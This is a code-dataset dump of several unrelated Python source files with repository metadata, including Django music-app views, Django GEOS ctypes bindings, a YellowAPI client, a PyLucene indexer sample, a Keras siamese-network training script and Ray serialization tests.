album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/b.html', {'album': album})
def all_songs_display_by_album_id(request, album_id):
album = get_object_or_404(Album, pk=album_id)
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
# class IndexView(generic.ListView):
# template_name = 'music/index.html'
# context_object_name = 'object_list'
#
# def get_queryset(self):
# return Album.objects.all()
def index_global(request):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
class DetailView(generic.DetailView):
model = Album
template_name = 'music/all_songs_by_albumID.html'
# class AlbumCreate(CreateView):
# # the name of html file must be album_form , then does work
# model = Album
# fields = ['artist', 'album_title', 'genre', 'album_logo']
def create_album(request):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
form = AlbumForm(request.POST or None, request.FILES or None)
'''TODO how to hide the attr like is_local_file in form'''
if form.is_valid():
album = form.save(commit=False)
album.user = request.user
album.is_local_file = True
album.album_logo = request.FILES['album_logo']
logo_type = album.album_logo.url.split('.')[-1]
logo_type = logo_type.lower()
if logo_type not in IMAGE_FILE_TYPES:
context = {
'album': album,
'form': form,
'error_message': 'Image file must be PNG, JPG, or JPEG',
}
return render(request, 'music/album_form.html', context)
album.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
context = {
"form": form,
}
return render(request, 'music/album_form.html', context)
def delete_album(request, album_id):
if not request.user.is_authenticated():
return render(request, 'music/login.html')
else:
album = Album.objects.get(pk=album_id)
album.delete()
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
def register(request):
form = UserForm(request.POST or None)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
context = {
"form": form,
}
return render(request, 'music/register.html', context)
def login_user(request):
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
print('user is active', user.is_active)
if user.is_active:
login(request, user)
print('user name is ', user.username)
albums = Album.objects.filter(user=request.user)
return render(request, 'music/index.html', {'object_list': albums})
else:
return render(request, 'music/login.html', {'error_message': 'Your account has been disabled'})
else:
return render(request, 'music/login.html', {'error_message': 'Invalid login'})
return render(request, 'music/login.html')
def logout_user(request):
logout(request)
form = UserForm(request.POST or None)
context = {
"form": form,
}
return render(request, 'music/login.html', context)
def display_search_results(request):
song_results = Song.objects.all()
query = request.GET.get("search")
if query:
song_results = song_results.filter(
Q(song_title__icontains=query)
).distinct()
if song_results:
return render(request, 'music/search_results.html', {
'songs': song_results,
})
else:
return render(request, 'music/no_answer_page.html')
def create_song(request, album_id):
form = SongForm(request.POST or None, request.FILES or None)
album = get_object_or_404(Album, pk=album_id)
if form.is_valid():
albums_songs = album.song_set.all()
for s in albums_songs:
if s.song_title == form.cleaned_data.get("song_title"):
context = {
'album': album,
'form': form,
'error_message': 'You already added that song',
}
return render(request, 'music/add_song.html', context)
song = form.save(commit=False)
song.album = album
song.audio_file = request.FILES['audio_file']
file_type = song.audio_file.url.split('.')[-1]
file_type = file_type.lower()
if file_type not in AUDIO_FILE_TYPES:
context = {
'album': album,
'form': form,
'error_message': 'Audio file must be WAV, MP3, or OGG',
}
return render(request, 'music/add_song.html', context)
song.file_type = file_type
song.save()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
context = {
'album': album,
'form': form,
}
return render(request, 'music/add_song.html', context)
def delete_song(request, album_id, song_id):
album = get_object_or_404(Album, pk=album_id)
song = Song.objects.get(pk=song_id)
song.delete()
return render(request, 'music/all_songs_by_albumID.html', {'album': album})
def play_song(request):
return render(request, 'music/player.html')
| [
"[email protected]"
] | |
3338255cae9bf2b53d9b53f0a16061db891618f2 | 41749b782cecd7364761a7768b09c8a0d1483618 | /.viz/Lib/site-packages/django/contrib/gis/geos/prototypes/geom.py | fa40a0b62b314cce16fb765a0e968c890d76b15a | [
"BSD-3-Clause"
] | permissive | Semiu/studentviz | c9a9a69d83bcb5e2e5b3768cf092ce00ada0d7db | 04f0850eb171cbbc5dc42bc079b60fe267c17157 | refs/heads/master | 2022-09-12T07:47:40.924894 | 2022-08-22T02:57:27 | 2022-08-22T02:57:27 | 158,165,526 | 0 | 0 | NOASSERTION | 2022-06-17T22:16:38 | 2018-11-19T05:15:04 | JavaScript | UTF-8 | Python | false | false | 3,332 | py | from ctypes import POINTER, c_char_p, c_int, c_ubyte, c_uint
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom,
check_minus_one,
check_string,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
pass
# ### ctypes factory classes ###
class GeomOutput(GEOSFuncFactory):
"For GEOS routines that return a geometry."
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
class IntFromGeom(GEOSFuncFactory):
"Argument is a geometry, return type is an integer."
argtypes = [GEOM_PTR]
restype = c_int
errcheck = staticmethod(check_minus_one)
class StringFromGeom(GEOSFuncFactory):
"Argument is a Geometry, return type is a string."
argtypes = [GEOM_PTR]
restype = geos_char_p
errcheck = staticmethod(check_string)
# ### ctypes prototypes ###
# The GEOS geometry type, typeid, num_coordinates and number of geometries
geos_normalize = IntFromGeom("GEOSNormalize")
geos_type = StringFromGeom("GEOSGeomType")
geos_typeid = IntFromGeom("GEOSGeomTypeId")
get_dims = GEOSFuncFactory("GEOSGeom_getDimensions", argtypes=[GEOM_PTR], restype=c_int)
get_num_coords = IntFromGeom("GEOSGetNumCoordinates")
get_num_geoms = IntFromGeom("GEOSGetNumGeometries")
# Geometry creation factories
create_point = GeomOutput("GEOSGeom_createPoint", argtypes=[CS_PTR])
create_linestring = GeomOutput("GEOSGeom_createLineString", argtypes=[CS_PTR])
create_linearring = GeomOutput("GEOSGeom_createLinearRing", argtypes=[CS_PTR])
# Polygon and collection creation routines need argument types defined
# for compatibility with some platforms, e.g. macOS ARM64. With argtypes
# defined, arrays are automatically cast and byref() calls are not needed.
create_polygon = GeomOutput(
"GEOSGeom_createPolygon",
argtypes=[GEOM_PTR, POINTER(GEOM_PTR), c_uint],
)
create_empty_polygon = GeomOutput("GEOSGeom_createEmptyPolygon", argtypes=[])
create_collection = GeomOutput(
"GEOSGeom_createCollection",
argtypes=[c_int, POINTER(GEOM_PTR), c_uint],
)
# Ring routines
get_extring = GeomOutput("GEOSGetExteriorRing", argtypes=[GEOM_PTR])
get_intring = GeomOutput("GEOSGetInteriorRingN", argtypes=[GEOM_PTR, c_int])
get_nrings = IntFromGeom("GEOSGetNumInteriorRings")
# Collection Routines
get_geomn = GeomOutput("GEOSGetGeometryN", argtypes=[GEOM_PTR, c_int])
# Cloning
geom_clone = GEOSFuncFactory("GEOSGeom_clone", argtypes=[GEOM_PTR], restype=GEOM_PTR)
# Destruction routine.
destroy_geom = GEOSFuncFactory("GEOSGeom_destroy", argtypes=[GEOM_PTR])
# SRID routines
geos_get_srid = GEOSFuncFactory("GEOSGetSRID", argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory("GEOSSetSRID", argtypes=[GEOM_PTR, c_int])
| [
"[email protected]"
] | |
72407ed89d05a5b5653217cf17b7c98e1679fa7a | 4469dfcaeb9b491a23df1b574a2d54ab74bb153d | /appfeedme/yellowapi.py | e73f1b1b1e678edb40b5a4264f6f60282010b6f0 | [] | no_license | assertnotnull/feed.me | 149bd9abd697cdb67301a90c061ace52a9cfa14c | c9c4a268dfce555cc97d73c6d256bb89b49e8969 | refs/heads/master | 2021-01-19T05:20:04.489348 | 2014-04-16T19:22:51 | 2014-04-16T19:22:51 | 4,608,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,877 | py | """
YellowAPI Python API Library
Requires: Python 2.3+
Version: 0.1 (2010-09-15)
"""
import urllib2
import urllib
import itertools
import re
class YellowAPI(object):
"""
A thin wrapper around urllib2 to perform calls to YellowAPI. This class
does not do any processing of the response contents (XML or JSON).
"""
PROD_URL = 'http://api.yellowapi.com'
TEST_URL = 'http://api.sandbox.yellowapi.com'
def __init__(self, api_key, test_mode=False, format='XML', handlers=[]):
if len(api_key) != 24:
raise TypeError('api_key should be 24 characters.')
self.api_key = api_key
if test_mode:
self.url = self.TEST_URL
else:
self.url = self.PROD_URL
if format not in ['XML', 'JSON']:
raise TypeError('Format should be XML or JSON')
self.format = format
self.opener = urllib2.build_opener(*handlers)
self.last_url = None
def find_business(self, what, where, uid, page=None, page_len=None,
sflag=None, lang=None):
"""
Perform the FindBusiness call.
"""
url = self._build_url('FindBusiness', what=what, where=where, UID=uid,
pg=page, pgLen=page_len, sflag=sflag, lang=lang)
return self._perform_request(url)
def get_business_details(self, prov, business_name, listing_id, uid,
city=None, lang=None):
"""
Perform the GetBusinessDetails call.
"""
kws = {'prov': prov, 'bus-name': business_name,
'listingId': listing_id, 'city': city,
'lang': lang, 'UID': uid
}
url = self._build_url('GetBusinessDetails', **kws)
return self._perform_request(url)
def find_dealer(self, pid, uid, page=None, page_len=None, lang=None):
"""
Perform the FindDealer call.
"""
url = self._build_url('FindDealer', pid=pid, UID=uid, pg=page,
pgLen=page_len, lang=lang)
return self._perform_request(url)
def get_last_query(self):
"""
Used for debugging purposes. Displays the url string used in the
last calls.
"""
return self.last_url
NAME_PATTERN = re.compile('[^A-Za-z0-9]+')
@staticmethod
def encode_business_name(name):
"""
Properly encode the business name for subsequent queries.
"""
return YellowAPI.NAME_PATTERN.sub('-', name)
def _build_url(self, method, **kwargs):
"""
Build an HTTP url for the request.
"""
kwargs.update({'apikey': self.api_key, 'fmt': self.format})
params = ["%s=%s" % (k,urllib.quote(str(v))) for (k,v) in itertools.ifilter(
lambda (k,v): v is not None, kwargs.iteritems())]
self.last_url = "%s/%s/?%s" % (self.url, method, "&".join(params))
return self.last_url
def _perform_request(self, url):
"""
Perform the GET Request and handle HTTP response.
"""
resp = None
try:
resp = self.opener.open(url)
body = resp.read()
except urllib2.HTTPError, err:
if err.code == 400:
msg = err.read()
err.msg += "\n" + msg
raise(err)
finally:
if resp:
resp.close()
return body
| [
"[email protected]"
] | |
2c0f680212d51ef2a600f4c5edf2dd6deae65d17 | 166bfd2ea9335362e44dc6aa910370329bf1e4c3 | /processing/__init__.py | bbaf18ddba0c7f443b9d29a7dc1d8ede2b7840e8 | [
"Apache-2.0"
] | permissive | ljthink/pyfecs | 8502d83c75d3742a722967197a9a867eb27ad146 | 38bf28decc5caf6c1f94263c9788880dd9c17707 | refs/heads/master | 2020-04-03T13:54:13.469391 | 2017-11-28T14:28:40 | 2017-11-28T14:28:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | """
Scripts concerned with processing raw data into objects ready for analysis.
Many of these can be run as semi-automated services.
""" | [
"[email protected]"
] | |
67549eb3ebb071caddfa86249289fba192ce0d44 | 074afd26d00bb742b03c12891b057ab263e640bf | /codeforces/1430A.py | 259ef4142c163c8fa3b5ce7e8ec89d1f9260b4f1 | [] | no_license | IsmailTitas1815/Data-Structure | 7a898800b1e53c778b1f2f11b0df259e52c20140 | fece8dd97d3e162e39fc31d5f3498a6dac49b0f0 | refs/heads/master | 2023-02-05T10:39:49.349484 | 2020-12-21T13:37:22 | 2020-12-21T13:37:22 | 296,343,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | for i in range(int(input())):
n = int(input())
if n<3 or n==4:
print(-1)
elif n%3==0:
print(n//3,0,0)
elif n%3==1:
print((n//3)-2,0,1)
elif n%3==2:
print((n//3)-1,1,0) | [
"[email protected]"
] | |
68f932c6112e815e3c6ea2b6718d9cc20bb4ab9a | ca4da546f815ef7e14fd79dfbc5a0c3f9f8c72c9 | /samples/LuceneInAction/lia/tools/BerkeleyDbIndexer.py | a5f57cf2e3ebbdef45a0169ea2edb661a337b8fc | [
"Apache-2.0"
] | permissive | qiugen/pylucene-trunk | be955aedca2d37411f0683e244c30b102d4839b4 | 990079ff0c76b972ce5ef2bac9b85334a0a1f27a | refs/heads/master | 2021-01-18T08:46:38.817236 | 2012-07-18T16:18:45 | 2012-07-18T16:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,388 | py | # ====================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ====================================================================
import os
from bsddb.db import DBEnv, DB
from bsddb.db import \
DB_INIT_MPOOL, DB_INIT_LOCK, DB_INIT_TXN, DB_THREAD, DB_CREATE, DB_BTREE
# missing from python interface at the moment
DB_LOG_INMEMORY = 0x00020000
from lucene import \
DbDirectory, IndexWriter, StandardAnalyzer, Document, Field
class BerkeleyDbIndexer(object):
def main(cls, argv):
if len(argv) < 2:
print "Usage: BerkeleyDbIndexer <index dir> -create"
return
dbHome = argv[1]
create = len(argv) > 2 and argv[2] == "-create"
if not os.path.exists(dbHome):
os.makedirs(dbHome)
elif create:
for name in os.listdir(dbHome):
if name.startswith('__'):
os.remove(os.path.join(dbHome, name))
env = DBEnv()
env.set_flags(DB_LOG_INMEMORY, 1);
if os.name == 'nt':
env.set_cachesize(0, 0x4000000, 1)
elif os.name == 'posix':
from commands import getstatusoutput
if getstatusoutput('uname') == (0, 'Linux'):
env.set_cachesize(0, 0x4000000, 1)
env.open(dbHome, (DB_CREATE | DB_THREAD |
DB_INIT_MPOOL | DB_INIT_LOCK | DB_INIT_TXN), 0)
index = DB(env)
blocks = DB(env)
txn = None
try:
txn = env.txn_begin(None)
index.open(filename = '__index__', dbtype = DB_BTREE,
flags = DB_CREATE | DB_THREAD, txn = txn)
blocks.open(filename = '__blocks__', dbtype = DB_BTREE,
flags = DB_CREATE | DB_THREAD, txn = txn)
except:
if txn is not None:
txn.abort()
txn = None
raise
else:
txn.commit()
txn = None
try:
txn = env.txn_begin(None)
directory = DbDirectory(txn, index, blocks, 0)
writer = IndexWriter(directory, StandardAnalyzer(), create,
IndexWriter.MaxFieldLength.UNLIMITED)
writer.setUseCompoundFile(False)
doc = Document()
doc.add(Field("contents", "The quick brown fox...",
Field.Store.YES, Field.Index.ANALYZED))
writer.addDocument(doc)
writer.commit()
writer.close()
except:
if txn is not None:
txn.abort()
txn = None
raise
else:
txn.commit()
index.close()
blocks.close()
env.close()
print "Indexing Complete"
main = classmethod(main)
| [
"[email protected]"
] | |
af150eafbd7e431eddf69d435af86c90726cd755 | 4cd28b2bd8ba92a5db81adadbf2ff8b1addbef5c | /python/siamese.py | c54512dcb3c8798d908a587e19186fedb0e61f25 | [] | no_license | mfsuve/GraduationProject | bd3f8b605f69809bf2fe0a37233efdf1179a0e3d | f408848be46a8fa7f66cab65a9212a78670b5908 | refs/heads/master | 2020-04-09T22:08:48.737997 | 2018-04-19T05:32:11 | 2018-04-19T05:32:11 | 124,243,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,933 | py | import cv2
from keras.layers import Input, Conv2D, Lambda, merge, Dense, Flatten, MaxPooling2D
from keras.models import Model, Sequential
from keras.regularizers import l2
from keras import backend as K
from keras.optimizers import SGD, Adam
from keras.losses import binary_crossentropy
import numpy.random as rng
import numpy as np
import os
import dill as pickle
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
# from scipy.misc import imread
data_path = '/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/'
def loadimgs(path,n=0):
#if data not already unzipped, unzip it.
if not os.path.exists(path):
print("unzipping")
os.chdir(data_path)
os.system("unzip {}".format(path+".zip"))
X = []
y = []
cat_dict = {}
lang_dict = {}
curr_y = n
#we load every alphabet seperately so we can isolate them later
for alphabet in os.listdir(path):
print("loading alphabet: " + alphabet)
lang_dict[alphabet] = [curr_y,None]
alphabet_path = os.path.join(path,alphabet)
#every letter/category has it's own column in the array, so load seperately
for letter in os.listdir(alphabet_path):
cat_dict[curr_y] = (alphabet, letter)
category_images=[]
letter_path = os.path.join(alphabet_path, letter)
for filename in os.listdir(letter_path):
image_path = os.path.join(letter_path, filename)
image = imread(image_path)
category_images.append(image)
y.append(curr_y)
try:
X.append(np.stack(category_images))
#edge case - last one
except ValueError as e:
print(e)
print("error - category_images:", category_images)
curr_y += 1
lang_dict[alphabet][1] = curr_y - 1
y = np.vstack(y)
X = np.stack(X)
return X, y, lang_dict
class Siamese_Loader:
"""For loading batches and testing tasks to a siamese net"""
def __init__(self, Xtrain, Xval):
self.Xval = Xval
self.Xtrain = Xtrain
self.n_classes, self.n_examples, self.w, self.h = Xtrain.shape
self.n_val, self.n_ex_val, _, _ = Xval.shape
def get_batch(self, n):
"""Create batch of n pairs, half same class, half different class"""
categories = rng.choice(self.n_classes, size=(n, ), replace=False)
pairs = [np.zeros((n, self.w, self.h, 1)) for i in range(2)]
targets = np.zeros((n, ))
targets[n//2:] = 1
for i in range(n):
category = categories[i]
idx_1 = rng.randint(0, self.n_examples)
pairs[0][i, :, :, :] = self.Xtrain[category, idx_1].reshape(self.w, self.h, 1)
idx_2 = rng.randint(0, self.n_examples)
category_2 = category if i >= n//2 else (category + rng.randint(1, self.n_classes)) % self.n_classes
pairs[1][i, :, :, :] = self.Xtrain[category_2, idx_2].reshape(self.w, self.h, 1)
return pairs, targets
def make_oneshot_task(self, N):
"""Create pairs of test image, support set for testing N way one-shot learning. """
categories = rng.choice(self.n_val, size=(N, ), replace=False)
indices = rng.randint(0, self.n_ex_val, size=(N, ))
true_category = categories[0]
ex1, ex2 = rng.choice(self.n_examples, replace=False, size=(2, ))
test_image = np.asarray([self.Xval[true_category, ex1, :, :]]*N).reshape(N, self.w, self.h, 1)
support_set = self.Xval[categories, indices, :, :]
support_set[0, :, :] = self.Xval[true_category, ex2]
support_set = support_set.reshape(N, self.w, self.h, 1)
pairs = [test_image, support_set]
targets = np.zeros((N, ))
targets[0] = 1
return pairs, targets
def test_oneshot(self, model, N, k, verbose=0):
"""Test average N way oneshot learning accuracy of a siamese neural net over k one-shot tasks"""
pass
n_correct = 0
if verbose:
print("Evaluating model on {} unique {} way one-shot learning tasks ...".format(k, N))
for i in range(k):
inputs, targets = self.make_oneshot_task(N)
probs = model.predict(inputs)
print('#### i:', i)
if np.argmax(probs) == 0:
n_correct += 1
percent_correct = (100.0*n_correct / k)
if verbose:
print("Got an average of {}% {} way one-shot learning accuracy".format(percent_correct, N))
return percent_correct
def W_init(shape, name=None):
"""Initialize weights as in paper"""
values = rng.normal(loc=0, scale=1e-2, size=shape)
return K.variable(values, name=name)
def b_init(shape, name=None):
"""Initialize bias as in paper"""
values=rng.normal(loc=0.5, scale=1e-2, size=shape)
return K.variable(values, name=name)
print('## Creating siamese net')
input_shape = (150, 100, 1)
left_input = Input(input_shape)
right_input = Input(input_shape)
convnet = Sequential()
convnet.add(Conv2D(64, (10, 10), activation='relu', input_shape=input_shape, kernel_initializer=W_init, kernel_regularizer=l2(2e-4)))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(128, (7, 7), activation='relu', kernel_regularizer=l2(2e-4), kernel_initializer=W_init, bias_initializer=b_init))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(128, (4, 4), activation='relu', kernel_initializer=W_init, kernel_regularizer=l2(2e-4), bias_initializer=b_init))
convnet.add(MaxPooling2D())
convnet.add(Conv2D(256, (4, 4), activation='relu', kernel_initializer=W_init, kernel_regularizer=l2(2e-4), bias_initializer=b_init))
convnet.add(Flatten())
convnet.add(Dense(4096, activation="sigmoid", kernel_regularizer=l2(1e-3), kernel_initializer=W_init, bias_initializer=b_init))
encoded_l = convnet(left_input)
encoded_r = convnet(right_input)
L1_distance = lambda x: K.abs(x[0]-x[1])
both = merge([encoded_l, encoded_r], mode = L1_distance, output_shape=lambda x: x[0])
prediction = Dense(1, activation='sigmoid', bias_initializer=b_init)(both)
siamese_net = Model(input=[left_input, right_input], output=prediction)
print('## Compiling siamese net')
optimizer = Adam(0.00006)
siamese_net.compile(loss="binary_crossentropy", optimizer=optimizer)
siamese_net.count_params()
# print('## images background loading')
# Xt, y, c = loadimgs('/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/images_background')
# print('Xt shape:', np.shape(Xt))
# print('y shape:', np.shape(y))
# print('c shape:', np.shape(c))
# print('## images evaluation loading')
# Xv, y, c = loadimgs('/home/mustafa/PCL_TUTORIAL/python/keras-oneshot/omniglot/python/images_evaluation')
# print('Xv shape:', np.shape(Xv))
# print('y shape:', np.shape(y))
# print('c shape:', np.shape(c))
def my_loader(path):
i = 0
Xt = []
Xv = []
for filename in os.listdir(path):
filepath = os.path.join(path, filename)
image = cv2.imread(filepath)
image = cv2.resize(image, (100, 150), interpolation=cv2.INTER_CUBIC)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if i < 65:
Xt.append(image)
else:
Xv.append(image)
i += 1
return np.expand_dims(np.stack(Xt), axis=1), np.expand_dims(np.stack(Xv), axis=1)
Xt, Xv = my_loader('/home/mustafa/PCL_TUTORIAL/python/finals/reduced/train')
print('Xt shape:', Xt.shape)
print('Xv shape:', Xv.shape)
loader = Siamese_Loader(Xt, Xv)
evaluate_every = 10
loss_every = 300
batch_size = 32
N_way = 20
n_val = 550
# siamese_net.load_weights("PATH")
best = 76.0
print('## Entering the loop')
for i in range(900000):
(inputs, targets) = loader.get_batch(batch_size)
# print('## i:', i)
# for ii in range(len(targets)):
# target = targets[ii]
# plt.suptitle('Same!' if target == 1 else 'Different!')
# plt.subplot(1, 2, 1)
# print('input1 shape:', np.shape(inputs[0][ii, :, :, :]))
# plt.imshow(np.reshape(inputs[0][ii, :, :, :], (150, 100)), cmap='gray')
# plt.subplot(1, 2, 2)
# plt.imshow(np.reshape(inputs[1][ii, :, :, :], (150, 100)), cmap='gray')
# plt.show()
loss = siamese_net.train_on_batch(inputs, targets)
print('## i:', i, 'loss:', loss)
# if i % evaluate_every == 0:
# val_acc = loader.test_oneshot(siamese_net, N_way, n_val, verbose=True)
# print('## val_acc:', val_acc)
# if val_acc >= best:
# print("saving")
# # siamese_net.save('PATH')
# best = val_acc
#
# if i % loss_every == 0:
# print("iteration {}, training loss: {:.2f}, ".format(i, loss)) | [
"[email protected]"
] | |
0249279d73b9c2701e375e170c9ea5283effc2a2 | 0953f9aa0606c2dfb17cb61b84a4de99b8af6d2c | /python/ray/tests/test_serialization.py | df5bcb8533273289b581ac3fbfe06276f43f2e69 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | oscarknagg/ray | da3dc03e24945ff4d5718fd35fc1b3408d8907eb | 20d47873c9e8f5bbb80fe36e5d16256c337c4db3 | refs/heads/master | 2023-09-01T01:45:26.364731 | 2021-10-21T07:46:52 | 2021-10-21T07:46:52 | 382,402,491 | 2 | 1 | Apache-2.0 | 2021-09-15T12:34:41 | 2021-07-02T16:25:05 | Python | UTF-8 | Python | false | false | 18,436 | py | # coding: utf-8
import collections
import io
import logging
import re
import string
import sys
import weakref
import numpy as np
from numpy import log
import pytest
import ray
import ray.cluster_utils
logger = logging.getLogger(__name__)
def is_named_tuple(cls):
"""Return True if cls is a namedtuple and False otherwise."""
b = cls.__bases__
if len(b) != 1 or b[0] != tuple:
return False
f = getattr(cls, "_fields", None)
if not isinstance(f, tuple):
return False
return all(type(n) == str for n in f)
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
b"",
b"a",
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
@pytest.mark.parametrize(
"ray_start_regular", [{
"local_mode": True
}, {
"local_mode": False
}],
indirect=True)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (is_named_tuple(type(obj1)) or is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo:
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar:
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz:
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux:
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass:
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
